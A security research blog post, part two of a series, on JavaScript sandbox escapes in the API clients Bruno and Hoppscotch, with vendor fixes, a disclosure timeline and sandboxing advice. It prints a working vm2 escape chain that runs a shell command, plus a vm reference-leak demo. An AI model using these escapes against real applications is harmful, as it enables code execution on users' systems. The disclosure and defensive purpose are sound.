Welcome back to the second part of our deep dive into the security risks of API clients. In Part 1, we explored how API clients work, focusing on the challenges of sandboxing untrusted JavaScript code in Postman and Insomnia. As we've seen, building robust sandboxes is not easy because there are many pitfalls.

In today's article, we'll continue our investigation by examining more complex sandbox bypasses and exploring more holistic sandboxing approaches. We'll also highlight the responses and fixes that vendors implemented following our disclosures. Furthermore, we will provide good practices on implementing robust JavaScript sandboxing using currently available tools.

Case Study 3: Bruno



After examining Postman and Insomnia last week, we'll continue with Bruno today. It has a similar user interface to the previously mentioned API clients and provides a similar feature set:

Like its cousins, Bruno also supports scripting capabilities. To prevent untrusted scripts from performing malicious actions, Bruno uses the vm2 package to sandbox the code. This package tries to fix the issues of Node.js's built-in vm module by proxying objects that are passed from the outside world into the sandbox, preventing access to dangerous properties. However, the package maintainer realized that this approach has fundamental flaws and discontinued the package in July 2023 due to unfixable security issues.

Because of these known vulnerabilities in vm2, attackers could escape Bruno's sandbox. The general technique is similar to what we saw last week: the attacker tries to get access to the function constructor of the outside world and uses it to run code outside of the sandbox. However, since vm2 tries to prevent this, attackers need to find ways to get access to the underlying objects that are being proxied. One such sandbox escape exploit is the following:

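```javascript
// Grab __lookupGetter__ and Function.prototype.apply via sandbox-visible objects
const g = ({}).__lookupGetter__;
const a = Buffer.apply;
// Indirectly call Buffer.__lookupGetter__('__proto__') to obtain the __proto__ getter
const p = a.apply(g, [Buffer, ['__proto__']]);
// Read the prototype of `a`, then use its constructor to reach the host's process object
const main = p.call(a).constructor('return process')().mainModule;
// Run a shell command outside the sandbox
main.require('child_process').execSync('id > /tmp/pwnd');
```

Here, the exposed Buffer constructor is proxied by vm2, which means that any calls and property accesses are delegated to the object in the outside world. Any dangerous accesses are blocked by the proxy, preventing direct access to the function constructor.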

In this case, however, using a clever combination of __lookupGetter__ and apply, it is possible to access an object's prototype in a way that cannot be proxied. This allows the attacker to access a plain, unproxied object from the outside world, which in turn can be used to access the outside world's function constructor and run unsandboxed code.
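To make the primitives in the exploit easier to follow, the same chain can be traced in plain Node.js, outside of any sandbox. This is only an illustrative sketch: it shows what each step evaluates to in an ordinary realm and does not reproduce vm2's proxying or the bypass itself.

```javascript
// Step 1: __lookupGetter__ is inherited from Object.prototype, and
// Buffer.apply is simply Function.prototype.apply.
const g = ({}).__lookupGetter__;
const a = Buffer.apply;

// Step 2: a.apply(g, [Buffer, ['__proto__']]) is equivalent to
// g.apply(Buffer, ['__proto__']), i.e. Buffer.__lookupGetter__('__proto__').
// The result is the accessor function behind the __proto__ property.
const p = a.apply(g, [Buffer, ['__proto__']]);

// Step 3: calling that getter with `a` as the receiver returns a's
// prototype, which is Function.prototype.
const proto = p.call(a);

// Step 4: the constructor of Function.prototype is the Function
// constructor, which can compile arbitrary source code.
const FunctionCtor = proto.constructor;

console.log(typeof p, proto === Function.prototype, FunctionCtor === Function);
```

In the real exploit, the interesting part is that the object obtained in step 3 belongs to the outside world and is no longer wrapped by vm2's proxy.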

In addition to these vm2 sandbox bypasses, variable values were processed as template literal strings, which means developers could interpolate JavaScript expressions into them. However, the evaluation of these variables was not sandboxed, giving attackers another way to execute arbitrary JavaScript code.
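The following sketch illustrates why evaluating variable values as template literals amounts to code execution. The helper names `interpolateUnsafe` and `interpolateSafe` are hypothetical and are not taken from Bruno's code base; the second function is just one possible way to substitute values without evaluating expressions.

```javascript
// Hypothetical helper: evaluates the value as a JavaScript template literal.
// Anything inside ${...} is executed as code in the host realm.
function interpolateUnsafe(template, vars) {
  const names = Object.keys(vars);
  const values = Object.values(vars);
  return new Function(...names, 'return `' + template + '`;')(...values);
}

// Hypothetical alternative: only replaces ${identifier} with a known variable
// and never evaluates expressions.
function interpolateSafe(template, vars) {
  return template.replace(/\$\{(\w+)\}/g, (match, key) =>
    Object.prototype.hasOwnProperty.call(vars, key) ? String(vars[key]) : match
  );
}

const benign = interpolateUnsafe('Hello ${name}', { name: 'world' });
// An attacker-controlled value can reference host globals such as process.
const hostile = interpolateUnsafe('${typeof process}', {});
const inert = interpolateSafe('${typeof process}', {});

console.log(benign, hostile, inert);
```

A real payload would call into `process` instead of just inspecting its type, which is why such evaluation needs to happen inside the same sandbox as the scripts.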

Remediation

To mitigate the vulnerabilities, the Bruno team switched their sandbox to QuickJS, a completely separate JS engine, which they compiled to WebAssembly. Since the QuickJS engine is executed within Node.js's WebAssembly runtime, the sandboxed code has no access to the system, so untrusted code can run without dangerous side effects.



In addition to that, the Bruno team added a user prompt when collections are imported. The user is informed about the potential risks and can decide between Safe Mode, which uses the safe sandbox but lacks some features, or Developer Mode, which supports all features but requires the user to trust the collection's authors. All JavaScript code originating from the collection file is then sandboxed using the user's choice, including variable template literals. The prompt looks like this:

This shows two holistic fix approaches: The first approach is shifting the responsibility to the users. The user needs to actively decide whether or not they trust the collection file, ideally while being educated about the risks.

The second holistic fix approach is to run untrusted code in an entirely separate JavaScript engine. This can either be an engine that does not provide any system access by design (like QuickJS compiled to WebAssembly), or a regular engine isolated using system features (such as Seccomp, cgroups, or namespaces).

Case Study 4: Hoppscotch



Hoppscotch, again, looks quite similar to its alternatives because they all feature a similar set of functionality. However, there is a difference under the hood of Hoppscotch that distinguishes it from the others. Instead of Electron, Hoppscotch is based on Tauri, a cross-platform framework written in Rust and TypeScript.

Tauri tried to learn from Electron's mistakes and avoid its pitfalls. For example, there is no direct way to give code in the web context access to privileged system APIs. If you still need to expose some system-level functionality to your application, you have to write the privileged part in Rust, which will be running outside of the web context, and implement a bridge between the web and privileged parts. Developers could still expose dangerous functionality to the web context that way, but it is much more explicit and therefore easier to audit.

To isolate untrusted code from a collection file, Hoppscotch uses another holistic approach to the sandboxing problem. Web Workers, a standard Web API available in Electron and Tauri, can be used to offload untrusted code into a separate thread with its own JavaScript context, without access to many of the common APIs.

Web Workers are a feature supported by all major browsers. A Web Worker behaves like a separate browser window without a UI and cannot access other windows directly. Since the worker has much less access to potentially dangerous APIs and runs in a different JavaScript context than the main application, it naturally isolates untrusted code from anything interesting to attackers. An application can execute code in a worker and use messaging APIs like postMessage to send code and receive the result.

This solved the sandboxing problem in the Tauri-based interactive client, but in the case of Hoppscotch, this is not the only option to process collection files. Hoppscotch also offers a command-line interface (CLI) which is entirely Node.js-based and does not use the Web Worker approach.

Instead, Hoppscotch's CLI used Node.js's built-in vm module without any attempts at preventing reference leaks. As we learned in last week's blog post, this module is not considered a security mechanism, making it trivial for attackers to escape.
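As a reminder of why the vm module alone is not enough, here is a minimal, harmless sketch of a reference leak. It is a generic illustration and not the exact payload from our report: the script only reads the host's process ID instead of running commands.

```javascript
const vm = require('node:vm');

// Untrusted script: walks from the context's global object to the host's
// Function constructor and uses it to evaluate code in the host realm.
const untrusted = "this.constructor.constructor('return process')().pid";

// The empty context object is created in the host realm, so its prototype
// chain still leads to the host's Object and Function constructors.
const leakedPid = vm.runInNewContext(untrusted, {});

// The "sandboxed" script obtained the real process object of the host.
console.log(leakedPid === process.pid);
```

Any object passed into the context, including the context object itself, can leak such a reference unless it is carefully wrapped, which is exactly what vm2 attempted and could not do reliably.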

To patch this vulnerability, tracked as CVE-2024-34347, the Hoppscotch maintainers went for another holistic fix: They migrated to isolated-vm, a package that spawns a new JavaScript context on the interpreter level. In the case of Node.js, which is powered by the V8 JavaScript engine, this means creating a new isolate. The untrusted code is executed in such an isolate, without access to system resources. To support more complex features, isolated-vm also provides the option to create bridges between trusted and untrusted code, enforce memory or CPU time limits on the untrusted code, and more.

How to Sandbox Securely

As a developer, the vulnerabilities we covered might leave you feeling hopeless, as there are so many pitfalls when sandboxing untrusted JavaScript code. So let's try to find a good set of practices that you can follow to be on the safe side. The right solution depends heavily on the environment and on the feature requirements, so let's split the answer into three scenarios:

Scenario 1: If your application runs in a context with browser capabilities, like Electron or Tauri, use a Web Worker or a new window. Browsers already provide a security boundary that prevents any JavaScript code from accessing system-level APIs, such as the file system or spawning processes. To keep this boundary in Electron, ensure your sandbox worker or window has nodeIntegration disabled.
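For Electron, the window that hosts the sandbox could be configured along these lines. This is a configuration sketch, not a complete application: the variable name `sandboxWindowOptions` and the choice of a hidden window are assumptions, while the `webPreferences` keys are Electron's own options.

```javascript
// Options for a hidden window that only hosts untrusted scripts.
// Intended to be passed to Electron's BrowserWindow constructor in the
// main process, e.g. new BrowserWindow(sandboxWindowOptions).
const sandboxWindowOptions = {
  show: false,
  webPreferences: {
    nodeIntegration: false,         // no require() or process in the page
    nodeIntegrationInWorker: false, // same restriction for Web Workers
    contextIsolation: true,         // keep preload scripts in a separate context
    sandbox: true,                  // run the renderer in Chromium's OS-level sandbox
  },
};

console.log(sandboxWindowOptions.webPreferences);
```

Spelling the options out explicitly, even where they match the framework's defaults, makes the intended security boundary visible during code review.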

To interface between your application and the untrusted code, use postMessage to send the code to a worker and receive the execution results. If you need to make functionality available to the untrusted code, use postMessage to bridge between the untrusted code and your application. Make sure to handle all messages received from the worker as untrusted, and verify everything as you would with a web service exposed to the internet. To prevent denial of service, you can also set a timeout and kill the worker or window if the untrusted code runs for too long.
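A minimal sketch of this pattern could look as follows. The message format (`type`, `id`, `value`), the function names, and the size limit are assumptions made for illustration, and `workerUrl` is expected to point to a hypothetical worker script that evaluates the received code and posts back a result. `runUntrusted` relies on the browser's Worker API, so it is meant for a web context such as Electron or Tauri.

```javascript
// Treat everything coming out of the worker as untrusted input: accept only
// the expected shape and copy the fields into a fresh object.
function validateWorkerMessage(data) {
  if (typeof data !== 'object' || data === null) return null;
  if (data.type !== 'result') return null;
  if (!Number.isInteger(data.id)) return null;
  if (typeof data.value !== 'string' || data.value.length > 65536) return null;
  return { type: 'result', id: data.id, value: data.value };
}

// Runs `code` in a dedicated worker and terminates it after `timeoutMs`.
function runUntrusted(workerUrl, code, timeoutMs) {
  return new Promise((resolve, reject) => {
    const worker = new Worker(workerUrl);
    const finish = (settle, value) => {
      clearTimeout(timer);
      worker.terminate(); // always tear the worker down
      settle(value);
    };
    const timer = setTimeout(
      () => finish(reject, new Error('untrusted script timed out')),
      timeoutMs
    );
    worker.onmessage = (event) => {
      const message = validateWorkerMessage(event.data);
      if (message) finish(resolve, message.value);
      else finish(reject, new Error('malformed message from worker'));
    };
    worker.onerror = () => finish(reject, new Error('worker failed'));
    worker.postMessage({ type: 'run', id: 1, code });
  });
}

console.log(validateWorkerMessage({ type: 'result', id: 1, value: 'ok' }));
console.log(validateWorkerMessage({ type: 'result', id: '1', value: 'ok' }));
```

Copying the validated fields into a new object, rather than passing the received object along, keeps unexpected extra properties from reaching the rest of the application.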

Scenario 2: If your application runs in a context without browser capabilities, like Node.js, use the third-party isolated-vm package. This is currently the most comprehensive solution, integrating into the JavaScript interpreter to provide robust isolation. When using isolated-vm, make sure to read the requirements section of its documentation, which contains important details for safe usage.

Scenario 3: If system access is desired, provide a sandboxed and an unsandboxed option. Let the user choose between the two while making the risks clearly visible in the prompt. Make the safe option the default. We have seen this approach taken by many applications, like Bruno, Insomnia, Visual Studio Code, or IntelliJ IDEA.

This approach does not fundamentally solve the problem of running untrusted code safely, which is virtually impossible when system access is desired. Instead, it gives the user an informed choice and lets them use common sense to prevent security incidents. However, scenarios 1 and 2 are always preferred if possible because they don't put the responsibility on the user.

Timeline

| Date | Action |
| --- | --- |
| 2024-03-19 | We report our findings to the Hoppscotch maintainers |
| 2024-03-19 | The Hoppscotch maintainers acknowledge our report |
| 2024-03-24 | We report our findings to the Bruno maintainer |
| 2024-04-22 | The Hoppscotch maintainers release a fix in @hoppscotch/js-sandbox version 0.8.0 |
| 2024-08-21 | Bruno ships Safe Mode in version 1.26.0 |

Outro

In this two-part blog series, we investigated the security risks in the popular API clients Postman, Insomnia, Bruno, and Hoppscotch. We started by understanding how these tools operate, highlighting their architecture using JavaScript-based cross-platform frameworks like Electron and Tauri. We then focused on the sandboxing of JavaScript code from untrusted collections, which showed that this is not an easy task.

Running untrusted code without any isolation is, of course, a bad idea, but it is also problematic to use seemingly working solutions such as Node.js's built-in vm module or the third-party vm2 package. These are known to have bypasses that let malicious code escape the sandbox and get access to system resources.

To finish our research with some actionable advice, we listed a few good practices on how to sandbox untrusted JavaScript code properly. However, there is no silver bullet, and it is important to thoughtfully build features that run untrusted code, always keeping in mind that anything going into or coming out of the sandbox needs to be treated with care.

Finally, we would like to thank the maintainers of Insomnia, Postman, Bruno, and Hoppscotch for their help with mitigating the issues we reported.

Related Blog Posts

- Part 1: Scripting Outside the Box: API Client Security Risks (1/2)

- Never Underestimate CSRF: Why Origin Reflection is a Bad Idea

- The Power of Taint Analysis: Uncovering Critical Code Vulnerability in OpenAPI Generator

- Why Code Security Matters - Even in Hardened Environments

- Diving Into JumpServer: Attacker’s Gateway to Internal Networks